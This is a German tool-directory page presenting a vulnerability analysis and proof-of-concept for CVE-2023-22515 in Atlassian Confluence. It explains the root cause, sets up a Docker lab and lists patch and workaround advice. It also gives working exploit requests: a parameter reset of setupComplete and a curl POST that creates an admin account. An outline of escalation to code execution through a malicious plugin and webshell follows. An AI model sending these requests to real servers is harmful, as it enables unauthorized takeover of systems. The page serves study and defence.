Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-22515 — Detaillierte Analyse und Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle von Atlassian Confluence Data Center und Server, die die Erstellung von Admin-Konten ohne Authentifizierung und potenzielle Remote-Code-Ausführung ermöglicht. | Kitploit
Tools/GitHubGitHub/dkq-k/cve-2023-22515
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Detaillierte Analyse und Proof-of-Concept-Exploit für CVE-2023-22515, eine kritische Schwachstelle in der Zugriffskontrolle von Atlassian Confluence Data Center und Server, die die Erstellung von Admin-Konten ohne Authentifizierung und potenzielle Remote-Code-Ausführung ermöglicht.

Teilen

CVE-2023-22515: Analysebericht zur Privilegieneskalation in Confluence Data Center & Server

1. Überblick (Overview)

CVE-2023-22515 ist eine kritische (Critical) Broken Access Control-Schwachstelle, die in Atlassian Confluence Data Center und Server-Produkten entdeckt wurde. Ein Angreifer kann aus der Ferne ohne Authentifizierung den anfänglichen Einrichtungsprozess des Servers reaktivieren, dadurch ein neues Administratorkonto erstellen und das System vollständig übernehmen.

  • CVE ID: CVE-2023-22515
  • CVSS-Score: 10.0 (Kritisch)
  • Betroffene Versionen: 8.0.0 – 8.5.1 (außer einigen Versionen)

2. Detaillierte Schwachstellenanalyse (Vulnerability Analysis)

Ursache (Root Cause)

Der Kern dieser Schwachstelle liegt in der unzureichenden Validierung zwischen dem Parameter-Bindungsmechanismus des XWork2-Frameworks und der Aktionsverarbeitungslogik (Action) von Confluence.

Angreifer können den Wert von bootstrapStatusProvider.applicationConfig.setupComplete über URL-Parameter auf false setzen. Diese Eigenschaft ist ein wichtiges Flag, das bestimmt, ob Confluence installiert und konfiguriert ist.

root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

Wenn diese Anfrage gesendet wird, erkennt der Server im Speicher, dass die Konfiguration nicht abgeschlossen ist. Dadurch wird die Konfigurationsdatei (confluence.cfg.xml) zwar nicht dauerhaft geändert, aber der Status zur Laufzeit geändert, sodass die Zugriffskontrolle umgangen werden kann.

Angriffsmechanismus (Attack Mechanism)

  1. Zurücksetzen des Konfigurationsstatus: Der Angreifer greift auf einen öffentlichen Endpunkt wie /server-info.action zu und übergibt den Parameter bootstrapStatusProvider.applicationConfig.setupComplete=false.
  2. Umgehung der Zugriffskontrolle: Der Server erkennt sich nun selbst als „wird installiert“-Status, sodass die Zugriffsbeschränkungen für die Administratorkonfigurationsseiten unter /setup/* aufgehoben werden.
  3. Erstellen eines Administratorkontos: Der Angreifer greift auf die Seite /setup/setupadministrator.action zu und erstellt ein neues Systemadministratorkonto.
  4. Systemübernahme: Der Angreifer meldet sich mit dem erstellten Administratorkonto an und erhält alle Berechtigungen des Systems. Dadurch sind weitergehende schädliche Aktionen wie das Hochladen von Webshells, Datenexfiltration oder die Verteilung von Ransomware möglich.

3. Reproduktion der Schwachstelle (Reproduction)

Umgebungsaufbau (Environment Setup)

Ein verwundbarer Confluence Server (Version 8.5.1) wurde mit Docker eingerichtet.

  • Docker Image: atlassian/confluence-server:8.5.1
  • Database: PostgreSQL 14

docker-compose.yml (Zusammenfassung):

root@kitploit:~
services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... DB Konfiguration ...

Exploit-Ausführung (Exploitation)

Um Probleme mit Python-Abhängigkeiten zu vermeiden, wurde ein PoC als Bash-Skript mit curl erstellt und ausgeführt.

Exploit Flow:

  1. Reset Setup Status:

    root@kitploit:~
    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    Ergebnis: Eine HTTP 302-Weiterleitungsantwort wurde zurückgegeben, und es wurde bestätigt, dass der Setup-Status intern zurückgesetzt wurde.

  2. Administrator erstellen:

    root@kitploit:~
    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    Ergebnis: Es wurde versucht, über diese Anfrage das Konto hacked_admin zu erstellen; später kann über die Anmeldeseite mit diesem Konto zugegriffen werden.

4. Gegenmaßnahmen (Mitigation)

Patch anwenden (Patch)

Es muss sofort auf die neueste von Atlassian bereitgestellte Version aktualisiert werden.

  • Behobene Versionen: 8.3.3, 8.4.3, 8.5.2 und höher

Temporäre Abhilfemaßnahmen (Workaround)

Falls ein Patch nicht möglich ist, muss der Zugriff auf den Endpunkt /setup/* auf Netzwerkebene (Load Balancer, WAF, Reverse Proxy usw.) blockiert werden.

  • Zu blockierende URL: /setup/*

6. Erweiterter Angriff: RCE (Remote Code Execution)-Szenario

Überblick

Ein Angreifer, der über CVE-2023-22515 Administratorrechte erlangt hat, kann zur Ausführung von Systembefehlen (RCE) übergehen.

Angriffskette (Attack Chain)

  1. Administratorkonto erstellen (CVE-2023-22515): Erlangen von Systemadministratorrechten wie zuvor beschrieben.
  2. Setup-Abschluss-Trick: Falls der Server im 'Setup-Modus' feststeckt, wird die Einrichtung entweder über /setup/finishsetup.action erzwungen (Lizenzumgehung erforderlich) oder es wird mit einer vorhandenen Sitzung nach zugänglichen Administratormenüs gesucht.
  3. Bösartiges Plugin hochladen:
    • Menü: Confluence Administration -> Manage Apps -> Upload App
    • Datei: .jar-Datei, die schädliche Java-Klassendateien enthält
  4. Befehlsausführung:
    • Zugriff auf die vom hochgeladenen Plugin bereitgestellte URL (z. B. /plugins/servlet/webshell?cmd=id) zur Ausführung von Systembefehlen

Einschränkungen der aktuellen Reproduktionsumgebung

Diese Laborumgebung (Docker) hat keine gültige Confluence-Lizenz, daher kann der anfängliche Einrichtungsschritt nicht abgeschlossen werden. Die Anfrage zur Erstellung eines Administratorkontos war zwar erfolgreich (302-Weiterleitung), aber der spätere Zugriff auf das Plugin-Menü und die eigentliche RCE-Ausführung waren eingeschränkt. In einer tatsächlichen Produktionsumgebung ist eine Lizenz registriert, sodass RCE ohne diese Einschränkungen sofort möglich ist.

7. Fazit (Conclusion)

CVE-2023-22515 ist eine sehr gefährliche Schwachstelle, die es ermöglicht, ohne Authentifizierung Administratorrechte zu erlangen. Der Angriff ist durch bloße Manipulation von URL-Parametern möglich, was die Angriffskomplexität sehr gering macht. Daher müssen Organisationen, die diese Versionen verwenden, sofort Patches oder Abhilfemaßnahmen anwenden.

Tool herunterladen